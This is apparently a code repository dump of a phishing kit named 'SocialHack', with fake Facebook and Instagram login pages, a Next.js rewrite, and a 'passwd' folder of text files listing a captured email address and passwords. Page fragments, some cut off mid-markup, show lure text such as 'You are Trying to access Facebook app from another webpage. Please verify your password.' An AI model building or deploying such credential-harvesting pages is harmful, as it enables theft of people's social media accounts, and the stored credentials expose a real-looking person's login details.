├── oldSocialHack ├── favcon.ico ├── favcon.jpg ├── fb_icon1.png ├── instagram.png ├── passwd │ ├── fb_pass.txt │ ├── fb_pass2.txt │ └── insta_pass.txt ├── facebook-logo.png ├── facebook-logo1.png ├── redirect.php ├── Docs │ ├── steps-to-follow.txt │ └── file_permissions_in_server.txt ├── README.md ├── DISCLAIMER.md ├── facebook-lp.php ├── style.css ├── facebook.php ├── index2.php └── index.php ├── jsconfig.json ├── next.config.mjs ├── public ├── vercel.svg ├── window.svg ├── file.svg ├── globe.svg └── next.svg ├── src └── app │ ├── login │ └── page.js │ ├── home │ └── page.js │ ├── page.js │ ├── layout.js │ ├── globals.css │ ├── api │ └── auth │ │ └── [...nextauth] │ │ └── route.js │ └── page.module.css ├── eslint.config.mjs ├── package.json ├── .gitignore └── README.md /oldSocialHack/favcon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/favcon.ico -------------------------------------------------------------------------------- /oldSocialHack/favcon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/favcon.jpg -------------------------------------------------------------------------------- /oldSocialHack/fb_icon1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/fb_icon1.png -------------------------------------------------------------------------------- /oldSocialHack/instagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/instagram.png -------------------------------------------------------------------------------- /oldSocialHack/passwd/fb_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | The 1st User name is: vishal@gmail.com && the 1st Password is: vishal1 3 | -------------------------------------------------------------------------------- /oldSocialHack/passwd/fb_pass2.txt: -------------------------------------------------------------------------------- 1 | 2 | The 1st password is: vishal123 3 | 4 | The 2nd password is: vishal123 5 | -------------------------------------------------------------------------------- /oldSocialHack/passwd/insta_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | The 1st password is: vishal1 3 | 4 | The 2nd password is: vishal2 5 | -------------------------------------------------------------------------------- /oldSocialHack/facebook-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/facebook-logo.png -------------------------------------------------------------------------------- /jsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "paths": { 4 | "src/*": ["./src/*"] 5 | } 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /next.config.mjs: -------------------------------------------------------------------------------- 1 | /** @type {import('next').NextConfig} */ 2 | const nextConfig = {}; 3 | 4 | export default nextConfig; 5 | -------------------------------------------------------------------------------- /oldSocialHack/facebook-logo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/facebook-logo1.png -------------------------------------------------------------------------------- /public/vercel.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /oldSocialHack/redirect.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/app/login/page.js: -------------------------------------------------------------------------------- 1 | import React from 'react' 2 | 3 | const page = () => { 4 | return ( 5 |
85 | 112 | Forgot password? 113 | 114 | Sign up for Facebook 115 |
116 | 117 |
83 | 84 | You are Trying to access Facebook app from another webpage. 85 |
96 |98 | Please verify your password. 99 |
100 | 109 |OR
110 | 111 |118 | Forgot password click here 119 |
120 | 121 |
89 | 90 | You are Trying to access Instagram app from another webpage. 91 |
102 |104 | Please verify your password. 105 |
106 | 115 |OR
116 | 117 |124 | Forgot password click here 125 |
126 | 127 |